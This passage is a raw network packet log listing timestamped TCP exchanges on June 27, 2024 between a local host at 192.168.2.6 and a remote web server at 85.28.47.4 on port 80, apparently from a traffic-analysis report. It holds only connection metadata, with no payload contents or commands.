                                                                Jun 27, 2024 05:58:10.563631058 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.563642979 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.563656092 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.563692093 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.563760042 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.563864946 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.563877106 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.563888073 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.563899994 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.563905001 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.563937902 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.564107895 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.564121008 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.564131975 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.564153910 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.564153910 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.564167023 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.564172983 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.564177036 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.564188004 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.564199924 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.564205885 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.564218044 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.564229012 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.564238071 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.564239979 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.564253092 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.564265966 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.564285040 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.564316988 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.564872980 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.564886093 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.564898014 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.564910889 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.564919949 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.564923048 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.564937115 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.564941883 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.564949989 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.564960957 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.564970970 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.564973116 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.564984083 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.564996958 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.565002918 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.565009117 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.565027952 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.565049887 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.565551043 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.565562963 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.565577030 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.565588951 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.565599918 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.565608978 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.565615892 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.565628052 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.565630913 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.565639973 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.565653086 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.565660000 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.565665007 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.565676928 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.565690041 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.565695047 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.565701962 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.565706968 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.565713882 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.565726042 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.565727949 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.565754890 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.565771103 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.566459894 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.566473961 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.566484928 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.566497087 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.566512108 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.566513062 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.566525936 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.566536903 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.566545963 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.566548109 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.566560984 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.566570997 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.566571951 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.566584110 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.566596985 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.566601992 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.566628933 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.566648006 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.567406893 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.567419052 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.567430973 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.567441940 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.567451954 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.567452908 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.567466021 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.567476988 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.567477942 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.567490101 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.567502022 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.567507982 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.567511082 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.567522049 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.567532063 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.567534924 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.567542076 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.567553043 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.567557096 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.567564011 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.567574024 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.567579031 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.567609072 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.568150043 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.568161964 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.568172932 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.568186045 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.568198919 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.568208933 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.568212986 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.568221092 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.568224907 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.568238020 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.568245888 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.568249941 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.568262100 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.568270922 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.568274975 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.568286896 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.568298101 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.568305016 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.568310022 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.568321943 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.568332911 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.568340063 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.568345070 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.568356037 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.568365097 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.568367958 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.568378925 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.568391085 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.568404913 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.568420887 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.568974018 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.568988085 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.568999052 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.569010973 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.569019079 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.569022894 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.569037914 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.569051981 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.569056034 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.569062948 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.569076061 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.569088936 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.569101095 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.569118977 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.569124937 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.569130898 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.569143057 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.569148064 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.569154978 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.569188118 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.569217920 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.650687933 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.650732994 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.650744915 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.650827885 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.650839090 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.650868893 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.650866032 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.650885105 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.650927067 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.650949955 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.651139975 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.651151896 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.651164055 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.651176929 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.651187897 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.651201010 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.651202917 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.651212931 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.651218891 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.651225090 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.651237011 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.651241064 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.651269913 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.651299000 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.651812077 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.651823997 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.651838064 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.651849031 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.651871920 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.651900053 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.651973963 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.651985884 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.651997089 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.652009010 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.652020931 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.652031898 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.652038097 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.652054071 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.652064085 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.652070999 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.652084112 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.652092934 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.652093887 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.652107954 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.652117014 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.652121067 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.652133942 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.652147055 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.652168989 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.652194977 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.652964115 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.652977943 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.652988911 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.653002024 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.653014898 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.653027058 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.653027058 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.653042078 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.653054953 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.653059959 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.653072119 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.653080940 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.653085947 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.653098106 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.653109074 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.653115988 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.653120041 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.653131962 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.653143883 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.653162956 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.653168917 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.653194904 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.653707027 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.653721094 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.653732061 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.653743982 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.653748035 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.653755903 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.653768063 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.653773069 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.653779030 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.653790951 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.653806925 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.653819084 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.653824091 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.653836966 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.653839111 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.653848886 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.653861046 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.653862000 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.653898001 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.654280901 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.654294014 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.654309034 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.654320955 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.654326916 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.654335022 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.654362917 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.654397011 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.696230888 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.701158047 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.871401072 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.871421099 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.871433020 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.871515989 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.871525049 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.871529102 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.871542931 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.871556997 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.871556997 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.871587038 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.871622086 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.871706009 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.871742964 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.871822119 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.871834040 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.871848106 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.871855974 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.871860027 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.871872902 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.871877909 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.871886015 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.871900082 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.871913910 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.871936083 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.872200966 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.872217894 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.872231960 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.872242928 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.872256994 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.872260094 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.872282982 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.872327089 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.872446060 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.872457981 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.872469902 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.872493982 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.872526884 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.872539997 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.872585058 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.872745991 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.872756958 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.872767925 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.872780085 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.872792959 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.872797966 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.872806072 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.872817993 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.872817993 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.872857094 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.873065948 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.873080015 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.873106003 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.873109102 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.873117924 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.873130083 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.873136997 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.873145103 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.873147964 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.873159885 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.873164892 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.873177052 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.873183012 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.873188019 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.873203039 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.873207092 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.873218060 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.873224020 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.873228073 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.873235941 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.873249054 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.873253107 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.873261929 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.873272896 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.873306990 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.874017000 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.874032974 CEST804971185.28.47.4192.168.2.6
